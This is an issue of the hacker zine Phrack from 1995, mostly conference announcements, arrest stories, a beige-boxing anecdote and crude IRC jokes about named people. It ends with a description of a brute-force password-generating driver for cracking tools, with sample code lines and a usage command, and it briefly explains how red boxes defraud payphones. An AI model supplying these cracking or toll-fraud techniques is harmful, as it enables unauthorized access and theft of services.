| ==Phrack Magazine== |
|
|
| Volume Six, Issue Forty-Seven, File 3 of 22 |
|
|
|
|
| // // /\ // ==== |
| // // //\\ // ==== |
| ==== // // \\/ ==== |
|
|
| /\ // // \\ // /=== ==== |
| //\\ // // // // \=\ ==== |
| // \\/ \\ // // ===/ ==== |
|
|
| PART I |
|
|
| ------------------------------------------------------------------------------ |
|
|
| -----BEGIN PGP SIGNED MESSAGE----- |
|
|
|
|
|
|
|
|
| Phrack Magazine and Computer Security Technologies proudly present: |
|
|
| The 1995 Summer Security Conference |
|
|
| SSSS U U M M M M EEEEE RRRR CCCC OOOO N N |
| S U U MM MM MM MM E R R C O O NN N |
| SSS U U M M M M M M M M EEE RRRR C O O N N N |
| S U U M M M M M M E R R C O O N NN |
| SSSS UUUU M M M M EEEEE R R CCCC OOOO N N |
|
|
| "SUMMERCON" |
|
|
| June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia |
|
|
| This is the official announcement and open invitation to the 1995 |
| incarnation of Summercon. In the past, Summercon was an invite-only |
| hacker gathering held annually in St. Louis, Missouri. Starting |
| with this incarnation, Summercon is open to any and all interested |
| parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators, |
| Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers, |
| Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, |
| Programmers, Conspiracy Nuts, Musicians and Nudists. |
|
|
| LOCATION: |
|
|
| The Clarion Hotel is located in downtown Atlanta, 9 miles from |
| Hartsfield International Airport and just a few blocks from the |
| Peachtree Center MARTA Station. |
|
|
|
|
| Considering the exorbitant expenses involved with attending other |
| conferences of this type, Rooms at Summercon are reduced to |
|
|
| $65 per night for Single or Double Occupancy |
|
|
| The Clarion Hotel Downtown, Courtland at 70 Houston St., NE, |
| Atlanta, GA 30303 |
| (404) 659-2660 or (800) 241-3828 (404) 524-5390 (fax) |
|
|
|
|
| No one likes to pay a hundred dollars a night. We don't expect you |
| to have to. Spend your money on room service, drinks in the hotel bar, |
| or on k-rad hacker t-shirts. Remember: Mention that you are attending |
| Summercon in order to receive the discount. |
|
|
| DIRECTIONS |
|
|
| 75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland |
| then turn left on Houston (John Wesley Dobbs Ave.) |
| 20 East - Exit 75/85 North at International. Turn Left on Courtland at |
| Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.) |
| 20 West - Exit 75/85 North at International. One block to Courtland |
| and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.) |
|
|
| Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's |
| International Airport will drop you off at many hotels in the downtown |
| area, including the Clarion. The shuttle should be no more than 12 |
| dollars. Fares may be paid at the Airport Shuttle in the Ground |
| Transportation area of the Airport Terminal. |
|
|
| MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a |
| convenient and inexpensive way to negotiate most of the Atlanta area. |
| Take the MARTA train from the Airport to the Peach Tree Center Station. |
| Walk three blocks down Houston to the intersection of Houston and |
| Courtland. The MARTA fare will be roughly 2 dollars. |
|
|
| Taxis - The average cab fare from Atlanta's Airport to the downtown area |
| is roughly 30 dollars. |
|
|
| CONFERENCE INFO |
|
|
| It has always been our contention that cons are for socializing. |
| "Seekret Hacker InPh0" is never really discussed except in private |
| circles, so the only way anyone is going to get any is to meet new people |
| and take the initiative to start interesting conversations. |
|
|
| Because of this, the formal speaking portion of Summercon will be |
| held on one day, not two or three, leaving plenty of time for people |
| to explore the city, compare hacking techniques, or go trashing and |
| clubbing with their heretofore unseen online companions. |
|
|
| The "Conference" will be held on June 3rd from roughly 11:00 am until |
| 6:00 pm with a 1 hour lunch break from 1:00 to 2:00. |
|
|
| NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping |
| and still photography will be permitted. |
|
|
|
|
| CURRENT LIST OF SPEAKERS: |
|
|
| Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source |
| Solutions (a private sector intelligence firm) |
|
|
| Topic: Hackers from the Intelligence Perspective |
|
|
| Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise", |
| Publisher of Security Insider Report, and noted security |
| expert |
|
|
| Topic: Electromagnetic Weaponry |
|
|
| Bob Stratton - Information Security Expert from one of America's largest |
| Internet service providers |
|
|
| Topic: The Future of TCP/IP Security |
|
|
| Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks" |
|
|
| Topic: Cryptography, Banking, and Commerce |
|
|
| Annaliza Savage - London-based Director/Producer |
|
|
| Topic: Discussion of her documentary "Unauthorized Access" |
| (Followed by a public screening of the film) |
|
|
| Chris Goggans - Editor of Phrack Magazine and Summercon M.C. |
|
|
| Topic: introductions, incidentals and a topic which is sure |
| to culminate in an international incident. |
|
|
|
|
| (Other Speakers May Be Added - Interested parties may contact scon@fc.net) |
|
|
| COSTS |
|
|
| Since other cons of this type have been charging from 25 to 40 dollars |
| entry fees, we are only charging 10 dollars. Yes, that's correct, |
| TEN (10) dollars in US currency. Money is far too scarce among the |
| hacker community to fleece everyone for money they will probably need |
| to eat with or pay for their hotel rooms. |
|
|
|
|
| WHAT TO DO IN ATLANTA: |
|
|
| To attempt to make everyone's stay in Atlanta more exciting, we are |
| contacting local establishments to arrange for special discounts and/or |
| price reductions for Summercon attendees. Information will be handed |
| out regarding these arrangements at the conference. |
|
|
| Atlanta is a happening town. |
|
|
| Touristy Stuff Party Time |
|
|
| The World of Coca-Cola Buckhead |
| Underground Atlanta The Gold Club |
| Georgia Dome (Baseball?) (Countless Other Clubs and Bars) |
| Six Flags |
|
|
| CONTACTING SUMMERCON SPONSORS |
|
|
| You can contact the Summercon sponsors by several means: |
|
|
| E-mail: scon@fc.net |
|
|
| WWW: http://www.fc.net/scon.html |
|
|
| Snail Mail: Phrack Magazine |
| 603 W. 13th #1A-278 |
| Austin, TX 78701 |
|
|
|
|
| If deemed severely urgent, you can PGP your email with the following PGP |
| key: |
|
|
| - -----BEGIN PGP PUBLIC KEY BLOCK----- |
| Version: 2.6 |
|
|
| mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP |
| Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk |
| Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR |
| tBRwaHJhY2tAd2VsbC5zZi5jYS51cw== |
| =evjv |
| - -----END PGP PUBLIC KEY BLOCK----- |
|
|
|
|
| See you in Atlanta! |
|
|
|
|
|
|
|
|
| -----BEGIN PGP SIGNATURE----- |
| Version: 2.6 |
|
|
| iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4 |
| 46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q |
| mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5 |
| uRix2FrftCY= |
| =m/Yt |
| -----END PGP SIGNATURE----- |
|
|
| ------------------------------------------------------------------------------ |
|
|
| UNAUTHORIZED ACCESS |
|
|
| "Unauthorized Access [is] a documentary that tells the story of the |
| computer underground from our side, it captures the hacker world |
| from Hamburg to Los Angeles and virtually everywhere in between." |
| 2600 The Hacker Quarterly |
|
|
| Computers are becoming an integral part of our everyday existence. |
| They are used to store and send a multitude of information, from |
| credit reports and bank withdrawals, to personal letters and highly |
| sensitive military documents. So how secure are our computer |
| systems? |
|
|
| The computer hacker is an expert at infiltrating secured systems, |
| such as those at AT&T, TRW, NASA or the DMV. Most computer systems |
| that have a telephone connection have been under siege at one time |
| or another, many without their owner's knowledge. The really good |
| hackers can reroute the telephone systems, obtain highly sensitive |
| corporate and government documents, download individual's credit |
| reports, make free phone calls globally, read private electronic |
| mail and corporate bulletins and get away without ever leaving a |
| trace. |
|
|
| So who are these hackers? Just exactly WHAT do they do and WHY do |
| they do it? Are they really a threat? What do they DO with the |
| information that they obtain? What are the consequences of their |
| actions? Are hackers simply playing an intellectual game of chess |
| or are hackers using technology to fight back and take control of |
| a bureaucratic system that has previously appeared indestructible? |
|
|
| Unauthorized Access is a documentary that demistifies the hype and |
| propaganda surrounding the computer hacker. Shot in 15 cities |
| and 4 countries, the film hopes to expose the truths of this subculture |
| focusing on the hackers themselves. |
|
|
| Unauthorized Access is a view from inside the global underground. |
|
|
| For a PAL (European) copy send a cheque/postal order for 15 British |
| Pounds or $25 for NTSC (American) standard to: |
|
|
| Savage Productions |
| Suite One |
| 281 City Road |
| London EC1V 1LA |
|
|
| ------------------------------------------------------------------------------ |
|
|
| ACCESS ALL AREAS |
| Hacking Conference |
|
|
| 1st - 2nd July, 1995 |
| (Saturday & Sunday) |
| King's College, London, UK |
|
|
|
|
| -------------------------------WHAT-IT-IS--------------------------------- |
|
|
| The first UK hacking conference, Access All Areas, is to be run in London |
| later this year. It is aimed at hackers, phone phreaks, computer security |
| professionals, cyberpunks, law enforcement officials, net surfers, |
| programmers, and the computer underground. |
|
|
| It will be a chance for all sides of the computer world to get together, |
| discuss major issues, learn new tricks, educate others and meet "The |
| Enemy". |
|
|
|
|
|
|
| -------------------------------WHERE-IT-IS-------------------------------- |
|
|
| Access All Areas is to be held during the first weekend of July, 1995 at |
| King's College, London. King's College is located in central London on |
| The Strand and is one of the premier universities in England. |
|
|
|
|
|
|
| -----------------------------WHAT-WILL-HAPPEN----------------------------- |
|
|
| There will be a large lecture theatre that will be used for talks by |
| computer security professionals, legal experts and hackers alike. The |
| topics under discussion will include hacking, phreaking, big brother and |
| the secret services, biometrics, cellular telephones, pagers, magstrips, |
| smart card technology, social engineering, Unix security risks, viruses, |
| legal aspects and much, much more. |
|
|
| Technical workshops will be running throughout the conference on several |
| topics listed above. |
|
|
| A video room, equipped with multiple large screen televisions, will be |
| showing various films, documentaries and other hacker related footage. |
|
|
| The conference facilities will also include a 10Mbps Internet link |
| connected to a local area network with various computers hanging off of it |
| and with extra ports to connect your laptop to. |
|
|
|
|
|
|
| ------------------------------REGISTRATION-------------------------------- |
|
|
| Registration will take place on the morning of Saturday 1st July from |
| 9:00am until 12:00 noon, when the conference will commence. Lectures and |
| workshops will run until late Saturday night and will continue on Sunday |
| 2nd July from 9:00am until 6:00pm. |
|
|
|
|
|
|
| ----------------------------------COST------------------------------------ |
|
|
| The price of admission will be 25.00 British pounds (approximately US $40.00) |
| at the door and will include a door pass and conference programme. |
|
|
|
|
|
|
| -----------------------------ACCOMMODATION-------------------------------- |
|
|
| Accommodation in university halls of residence is being offered for the |
| duration of the conference. All prices quoted are per person, per night |
| and include full English breakfast. (In British pounds) |
|
|
|
|
| SINGLE TWIN |
| WELLINGTON HALL 22.00 16.75 |
|
|
|
|
| Special prices for British and Overseas university students, holding |
| current student identification, are also available - please call King's |
| Campus Vacation Bureau for details. |
|
|
| All bookings must be made directly with the university. They accept |
| payment by cash, cheque and credit card. |
|
|
| To making a booking call the following numbers... |
|
|
|
|
| KING'S CAMPUS VACATION BUREAU |
|
|
| Telephone : +44 (0)171 351 6011 |
| Fax : +44 (0)171 352 7376 |
|
|
|
|
|
|
| ----------------------------MORE-INFORMATION------------------------------ |
|
|
| If you would like more information about Access All Areas, including |
| pre-registration details then please contact one of the following... |
|
|
|
|
| Telephone : +44 (0)973 500202 |
| Fax : +44 (0)181 224 0547 |
| Email : info@phate.demon.co.uk |
|
|
|
|
|
|
| ------------------------------------------------------------------------------ |
|
|
| D I S T R I B U T E W I D E L Y |
|
|
| *****FIRST CALL FOR PAPERS***** |
|
|
| InfoWarCon '95 |
|
|
| A 2 Day International Symposium |
| on Information Warfare |
|
|
| September 7-8, 1995 |
| Stouffer Concourse Hotel |
| Arlington, VA |
|
|
| Presented by: |
| National Computer Security Association |
| Winn Schwartau and Interpact, Inc. |
| Robert Steele and OSS, Inc. |
|
|
|
|
| CONFERENCE OVERVIEW: |
|
|
| The Information Warfare Conference (InfoWarCon) is our third |
| international conference dedicated to the exchange of ideas, |
| policies, tactics, weapons, methodologies and defensive posture |
| of Information Warfare on a local, national, and global basis. |
|
|
| InfoWarCon will bring together international experts from a broad |
| range of disciplines to discuss and integrate concepts in this |
| rapidly evolving field. Attendees will intensely interact with |
| the speakers and presenters as well as each other to increase |
| each other's understanding of the interrelatedness of the topics. |
|
|
| While there are many interpretations of Information Warfare by |
| different groups, the current working definition we employ is: |
|
|
| Information Warfare is the use of information and informa |
| tion systems as weapons in a conflict where information and |
| information systems are the targets. |
|
|
| Information Warfare is broken down into three categories, and |
| InfoWarCon speakers and attendees will interactively examine them |
| all: |
|
|
| Class I: Personal Privacy. "In Cyberspace You Are Guilty |
| Until Proven Innocent." The mass psychology of information. |
| Privacy versus stability and law enforcement. |
|
|
| Class II: Industrial and Economic Espionage. Domestic and |
| international ramifications and postures in a globally |
| networked, competitive society. |
|
|
| Class III: Global Information Warfare. Nation-state versus |
| Nation-state as an alternative to convention warfare, the |
| military perspective and terrorism. |
|
|
| THE CONFERENCE |
|
|
| The conference is designed to be interactive - with extensive |
| interaction between all participants. The preliminary contents |
| and discussions will focus on: |
|
|
| - What is Information Warfare? |
| - What Are the Targets? |
| - Protecting the Global Financial Infrastructure |
| - Military Perspectives on InfoWar |
| - InfoWar Vs. Non-Lethal Warfare |
| - Defending the U.S. Infrastructure |
| - The Intelligence Community and Information |
| - Open Source Intelligence |
| - The Psychology of Information |
| - Privacy Balances |
| - Information As the Competitive Edge |
| - International Cooperation |
| - Denial of Service |
| - Cyber-Terrorism |
| - Offensive Terrorism |
| - Offensive InfoWar Techniques |
| - Defensive InfoWar Postures |
| - Education and Awareness Training |
| - Corporate Policy |
| - Government Policy |
| - Global Policy |
| - Espionage |
| - Export Controls of Information Flow |
| - The Legal Perspective |
| - The New Information Warriors |
|
|
| Plenary sessions will accommodate all attendees, while break-out |
| sessions will provide more intimate presentations and interactiv |
| ity on topics of specific interests. |
|
|
| SUBMISSIONS: |
|
|
| Submission for papers are now be accepted. We are looking for |
| excellent speakers and presenters with new and novel concepts of |
| Information Warfare. You may submit papers on the topics listed |
| above, or on others of interest to you, your company or govern |
| ment. |
|
|
| We welcome innovative thought from the private sector, the gov |
| ernment (civilian, military and intelligence) and the interna |
| tional community. Submissions must be received by May 1, 1995, |
| and notification of acceptance will occur by June 1, 1995. |
| Please submit 2-3 page presentation outlines to: |
|
|
| winn@infowar.com. |
|
|
| All submissions and the contents of InfoWarCon '95 will be in |
| English. If you must submit a hard copy: Fax: 813.393.6361 or |
| snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL |
| 34642 |
|
|
| All submissions and presentation should be unclassified, as they |
| will become Open Source upon submission and/or acceptance. |
|
|
| SPONSORS: |
|
|
| The Information Warfare Symposium is currently choosing sponsors |
| for various functions. |
|
|
| Continental Breakfast, Day 1 and Day 2 |
| Morning Coffee Break, Day 1 and Day 2 |
| Lunch, Day 1 and Day 2 |
| Afternoon Coffee Break, Day 1 and Day 2 |
| Cocktail Party, Day 1 |
|
|
| Each Corporate or Organizational sponsor will be included in all |
| promotional materials and Symposium function. For more infor- |
| mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or |
| email: 747774.1326@Compuserve.com. |
|
|
| EXHIBITS: |
|
|
| Limited space is available for table-top displays for commercial |
| or governmental products, services, educational or other promo |
| tion. For further information, contact Paul Gates at the National |
| Computer Security Association. 717.258.1816 |
|
|
| REGISTRATION: |
|
|
| Payment made BEFORE July 1, 1995: |
|
|
| ( ) $445.00 NCSA Member/OSS Attendee |
| ( ) $545.00 All others |
|
|
| Payment made AFTER July 1, 1995: |
|
|
| ( ) $495.00 NCSA Members/OSS Attendees |
| ( ) $595.00 All others |
|
|
| ( ) I'M INTERESTED, but would like more information sent to the |
| address above. Please include a free copy of your 32 page |
| "Information Security Resource Catalog". |
|
|
| ( ) I'd like to know more about NCSA on-site training, security |
| audits and consulting services. Please have someone give me |
| a call. |
|
|
| MAIL OR FAX TO: |
|
|
| National Computer Security Association |
| 10 South Courthouse Avenue |
| Carlisle, PA 17013 |
| Phone 717-258-1816 or FAX 717-243-8642 |
| EMAIL: 74774.1326@compuserve.com |
| CompuServe: GO NCSAFORUM |
|
|
| Winn Schwartau Interpact, Inc. |
| Information Security & Warfare |
| V:813.393.6600 F:813.393.6361 |
| Email: Winn@Infowar.Com |
|
|
| ------------------------------------------------------------------------------ |
|
|
| Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested |
| on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale |
| of a device to commit Telecommunications fraud charges. He is being held in |
| Delaware County Prison in lieu of $100,000.00 Bail. His story follows. |
|
|
| On the evening of the 13th Bernie S. received a page from his mail drop. |
| Some people he knew from Florida had stopped in at his mail drop thinking |
| it was his address. They were looking to purchase several 6.5 Mhz Crystals. |
| These crystals when used to replace the standard crystal in the RADIO SHACK |
| Hand Telephone dialer, and with some programming, produce tones that trick |
| pay phones into believing they have received coins. These are commonly |
| referred to as "red boxes" and got their name from an actual red box pulled |
| from a pay phone in the late seventies by some curious person. |
|
|
| Ed Cummings met these people at a local 7-11 (which 7-11?) where he was |
| to sell the widely used electronic timing crystals for roughly $4 a piece. |
| The purchaser only had two twenty dollar bills and Ed Cummings no change. |
| Ed Cummings went into the 7-11 to get some change to make the transaction. |
| A police officer noticed a van parked in the parking lot of the 7-11 with |
| more several African Americans inside. As Ed was leaving the 7-11 he noticed |
| fifteen police cars pulling into the parking lot of the 7-11. |
|
|
| Next thing he knew the police were asking him if they could `rifle` |
| through his car. He said no. Moments later as he was talking to a Detective |
| and noticed another police officer going through his car. He asked the officer |
| to stop. They did not, in all the police confiscated a few hundred 6.5Mhz |
| crystals (which he resells for roughly $4 a piece) and a large box of 100 |
| dialers. The police told him they would get back to him, and he could have |
| his electronics back if the contents of the bag were legal. In the contents |
| of the seized items was one modified dialer, that a customer returned after |
| modification explaining that it did not work, a broken red box. |
|
|
| The next day Ed `Bernie S.` Cummings was over at a friend`s house working |
| on their computer when eight to ten plain clothed armed men burst into the |
| house and ordered him and his friends to freeze. They cuffed him and took him |
| to a holding cell (what jail?). There he was left without a blanket or jacket |
| to sleep with in the cold cell. |
|
|
| That evening the Secret Service had been called in when someone figured |
| out what the dialers and crystals would do when put together. The |
| United States Secret Service found his home and entered it, while they were |
| questioning him. |
|
|
| The next morning at his arraignment he was finally told of the charges |
| he was being held upon. They were Two misdemeanor Charges of manufacture, |
| Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful |
| use of a computer charges. His bail was automatically set to $100,000.00 |
| because Ed Cummings refused talk with the police without his attorney present. |
|
|
| The Secret Service presented to the judge a 9 page inventory of what |
| they had found in his home. On that inventory there 14 computers. 2 printers. |
| more Boxes of bios chips for the systems he worked with. Eprom burners which |
| the Federal Agents had labeled "Cellular telephone chip reprogramming adapters" |
| Eproms are used in everything from Automobile computers to personal computers. |
| They also confiscated his toolbox of screw drivers, wire clippers and other |
| computer oriented tools he used for his consulting job. |
|
|
| The Judge dropped the Two unlawful use of a computer charges due to |
| the fact that the evidence was circumstantial and the county had no actual |
| evidence that Ed had ever used the computers in question. |
|
|
| As of 3/27/1995 Ed Cummings is still in Delaware County Prison |
| awaiting his trial. His trial has not yet been scheduled and Ed will most |
| likely not raise the One Hundred Thousand Dollars needed to be released on |
| bail. |
|
|
| ------------------------------------------------------------------------------ |
|
|
| "Don't believe the hype." - Public Enemy, 1988 |
|
|
| This file's purpose is to clear up any misconceptions about the recent |
| situation that has come upon the sociopolitical group known as KoV. |
|
|
| As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for |
| ANYTHING. We have received several tip-offs from private sources regarding |
| a supposed "FBI investigation" of our group that is purported to be active |
| at this very minute. However, with the exception of a few VERY suspicious |
| incidents and coincidences, there has been NO HARD EVIDENCE thus far about |
| ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for |
| the integrity of our innocence, we must stress that nothing has gone down. |
|
|
| Yet. |
|
|
| We have very good reason to believe that a few of those among us are about |
| to be charged with various false accusations by a local university. However |
| the current mental state of the person in charge of this charade is also in |
| question. Therefore it would be logical to assume nothing. The conflicting |
| tip-offs, rumors, warnings and threats that we have received make it even |
| more difficult to get a clear picture of exactly what is going on. We have |
| heard so many things from so many different sources, both credible and |
| questionable, that we would be hard-pressed to give an accurate evaluation |
| of the current state of things. |
|
|
| What we can say for sure, however, is that KoV officially died on Monday, |
| January 23, 1995, along with its communications network, KoVNet. This |
| promises to be a great loss to the open-minded and sociopolitical community |
| as well as the free-thinkers and activists who supported us so generously. |
| Our reasons for disbanding the group were many, but the foremost was in |
| light of the current situation we are facing. |
|
|
| Consider this last obstacle our final, stalwart stand against the evils of |
| AmeriKKKan government and its various greedy, capitalistic agencies. |
| From the moment of KoV's conception, they have publicly sought to destroy |
| us; to silence our questioning of authority, to oppress our free-thinking |
| minds, and to close off our intellectual channels of communication. They |
| have even gone so far as to stalk us in public places. 'Tis a shame indeed. |
|
|
| If you have any questions or if you wish to contact us for any reason, |
| you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV". |
| I will try to post further updates of this saga to CiPNet, ThrashNet, |
| QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can. |
| We would appreciate any support that other h/p, art or political groups can |
| lend us. Until then, my friends... |
|
|
| -Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV |
|
|
| ------------------------------------------------------------------------------ |
|
|
| What happens when you are caught beige boxing. |
|
|
| by Rush 2 |
|
|
|
|
| Yeah yeah, I'm the only one. But here is a generally interesting |
| description of everything to getting caught to arraignment. |
|
|
| Well about 5 months ago i needed to set up a conference really quick.. |
| it was about 12:00 (never knew there was a 10:00 pm curfew in that area) |
| and went to a 25 pair box at this local strip mall. Well I was out there |
| the box was already open and I was just about to start testing pairs to |
| see which was connected and what wasn't. |
|
|
| All of a sudden, i hear this loud screeching sound of a car coming |
| to a skid from doing about 90mph. I turned and saw that typically dirty |
| squad car about to hit me.. you know the car, mud and dust on the tires |
| and body, coffee and smudge marks all over the windshield. i got on my |
| bike and started to run. Now the thing is I COULD have gotten away.. the |
| pathetic excuse for a cop had run not more than 10 yards after me and |
| decided that I was a threat so he pulled his handgun and yelled. I saw |
| this and thought it would be wiser to stop than get shot. |
|
|
| Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did |
| not know i was less than a half mile from a police station and they were |
| looking for a prowler in the general area. The police did the normal, |
| called me scum, asked me what i was doing, searched me until they were |
| satisfied... than picked me up and threw me in the car... the funny |
| thing was they didn't see my phone until they threw me into the back seat |
| and the cord fell out.. (they never saw the page of notes and 'naughty' |
| material in my pocket though it was about 4 inches thick and sticking out |
| that a blind man could see it. |
|
|
| Well they got me to the station and pried my info out, and called my |
| father... I came up with a good enough story about some made up user |
| who told me to go across the street and plug in.. then I was told I |
| would be dealt with in the next week... I did not receive anything for |
| three and a half months. |
|
|
| Once the time came for the arraignment (for a juvenile they called it |
| an intake). I got to go to the police station, sit for about 3 hours (as |
| if i thought they would be on time) until I waited for my probation |
| officer. Finally she got there and we proceeded to talk. She explained |
| all of the charges and my lawyer (interesting guy) laughed, I was being |
| charged with prowling (could be disputed I was on a public sidewalk and |
| there in that strip mall is a 24 hr laundry mat), loitering (again that |
| could be disputed), and attempted theft of services (though I NEVER even |
| plugged in). |
|
|
| After this was all said i spent the next hour talking with the lady |
| in private. I immediately found she had an interest in computers and was |
| having a problem with her home pc. So I easily changed the topic to my |
| fascination in computers and solved her problem with her computer, and |
| answered at least 50 questions about them. In the last 10-15 minutes of |
| the conversation all i could get from her were statements about how |
| impressed and how intrigued she was with me. She ended up giving me a |
| look (that was hard to judge but i am staying away from this chick) that |
| was either confusion or attraction, slipped me a card with her home phone |
| number and name and called back in my lawyer and parents. |
|
|
| Once they got back in, all that she really said was I was a great boy, |
| that she would like to see me do more with my time besides computers, and |
| that she was taking my sentence of 12 months formal probation with 300 |
| hours of community service to 3 months of informal probation with 30 |
| hours of community service. That and she said bell was asking her what |
| to do and she would tell them that it was a non issue since I did not |
| plug in and even if I had it would not be their concern unless I had |
| plugged in to the telco access part of the network interface. |
|
|
| Well I have yet to receive official record of having to perform |
| the community service or the probation but I called my probation officer |
| yesterday and said she wasn't putting the community service into the |
| punishment and it has been an equivalent amount of time to just say that |
| since I haven't gotten in trouble since she will count the probation as |
| already served. Luckily she based all other needs of me on the report |
| from a teacher, and with my luck she picked the one teacher, my computers |
| teacher, that no matter what I did or said would lie and say I didn't. |
|
|
|
|
| Thanks to erikb for publishing this, and greets to CXrank, paradox, |
| dark phiber, the fat cop (who spilled his coffee and box of donuts |
| coming after me) that made this all possible, and to everyone else. |
|
|
|
|
| -rush 2 |
| http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html |
|
|
|
|
| Look for My site, unforeseen danger soon to be on a 28.8 slip |
| and by the end of the summer on a 500k slip connect. |
|
|
|
|
| ------------------------------------------------------------------------------ |
|
|
| [Something found on IRC] |
|
|
| Danny Partridge Emmanuel Goldstein |
| (AKA Danny Bonaduce: (AKA Eric Corley: |
| a child star from the child-like publisher |
| "The Partridge Family" of 26oo magazine. |
| ---------------------- ------------------ |
|
|
| Hosts a boring local Hosts a boring local |
| radio program. radio program. |
|
|
| Quasi Celebrity Quasi Celebrity |
| Status among Status among |
| 70's freaks telephone phreaks |
|
|
| Periods of Heavy Periods of Heavy |
| Drug Usage Drug Usage |
|
|
| Involved in Sex Involved in Sex |
| Scandal with Scandal with |
| another man another man |
|
|
| Last name is Friends with Phiber |
| "Bonaduce" Optik whose first |
| handle was "Il Duce" |
|
|
| Supplements incoming Supplements incoming |
| by doing desperate by doing desperate |
| local talk shows local talk shows |
| whenever he can. whenever he can. |
|
|
| ------------------------------------------------------------------------------ |
|
|
| Top 10 #hack fights that would be the coolest to see. |
| (And no, Ophie's not in it twice just because she's a girl...) |
| =========================================================================== |
|
|
| 10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling |
| featuring KL & TK. |
|
|
| 9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the |
| one after that... or, uh... |
|
|
| 8.) C-Curve and Elite Entity, "Who's who?" |
|
|
| 7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere." |
| (Or: "I'm totally numb, let me hug you!!!") |
|
|
| 6.) Dan Farmer and Pete Shipley: "Whips vs. Chains" |
|
|
| 5.) Grayarea vs. Netcom "No, *I* want root..." |
|
|
| 4.) WWF Wrestling with Len and |al|. |
|
|
| 3.) Ophie vs. Voyager, "Night of the Living Dead." |
|
|
| 2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle." |
| and the number one #hack fight is |
|
|
| 1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl" |
|
|
|
|
| ------------------------------------------------------------------------------ |
|
|
| P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit |
| +++++++++++++++++++++++++++++++++++++++++++++ |
|
|
| The device driver code listed below provides a data stream of passwords. |
| The device driver approach was used to speed up the process |
| of cracking passwords on an incremental basis. The usual approach was |
| to generate the passwords to a file, then reading the file, etc..the device |
| driver approach circumvents these file storage problems, and others, such as |
| having enough free disk space and delays from disk i/o. |
| This driver operates completely in memory (approx. 0.5Kb) |
|
|
| How practical is this? |
| ---------------------- |
| This program would be very useful if you think you may know what strategy |
| the user/admin uses for picking out their passwords. Without eliciting some |
| sort of a strategy, forget it-- unless your desperate enough!! |
|
|
|
|
| A "strategy" could consist of any of these possible advantages-- |
|
|
| 1) default passwords (ie: SIN, student #, birth date, phone number...) |
| 2) the mutation of a lUSERs' known password from another system |
| 3) viewing the mark typing in most of their password with a couple |
| of unseen characters |
| 4) etc... |
|
|
| --------------------------- |
| With the sample device driver provided, passwords starting at |
| 'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length |
| of the password string can be modified by changing the length of |
| the password string itself (that is, the variable "number"). The |
| range of characters in the passwords can also be changed by |
| modifying the following two lines: |
|
|
| ;hackdrv.sys |
| ;. |
| ;. |
| ; |
| for ending character-- |
| cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range |
|
|
| ...and for starting character |
| cmp byte ptr [number+si],'a' ;starting char. in range |
| ; |
| ;---------------------- |
|
|
| for instance, if you wished to generate numbers from "0000000" to |
| "9999999" |
|
|
| -change the ending character to: |
| cmp byte ptr [number+si],'9'+1 |
|
|
| -starting character to: |
| cmp byte ptr [number+si],'0' |
|
|
| and "number" variable from 'aaaaaa' to '0000000' and then |
| recompile.. |
|
|
| ----- |
|
|
| ..or in the third case, if u had observed a lUSER type in most of |
| their password, you may want to rewrite the code to limit the |
| search. IE: limit the keys to a certain quadrant of the keyboard. |
| Modify the code starting at "reiterate:" and ending at "inc_num |
| endp" for this. |
| ================================================================= |
|
|
|
|
| /'nuff of this!/ How do I get things working? |
| ----------------------------------------------- |
|
|
| Compile the device driver "hackdrv.sys", and the second program, |
| "modpwd.asm". Then specify the device driver inside config.sys |
| (ie: "c:\hackdrv.sys"). The code below was compiled with the a86 |
| compiler, v3.03. Some modifications might be needed to work with |
| other compilers. |
|
|
| To use it in prgs like crackerjack, type in the following on the |
| command line: |
|
|
|
|
| c:\>jack -pwfile:<your password file here!> -word:hackpwd |
|
|
| ------ |
| If you had stopped a cracker program (eg: crackerjack) and want to |
| pick up from where you left off, run the program "modpwd.com". |
|
|
| This program can change HACKDRVs password through- |
|
|
| a) a command line argument (ie: "modpwd aabbbbe") |
| b) executing the program with no parameters (this method also |
| displays the current password in memory) |
|
|
|
|
|
|
| Happy Hacking, |
| Uncle Armpit |
|
|
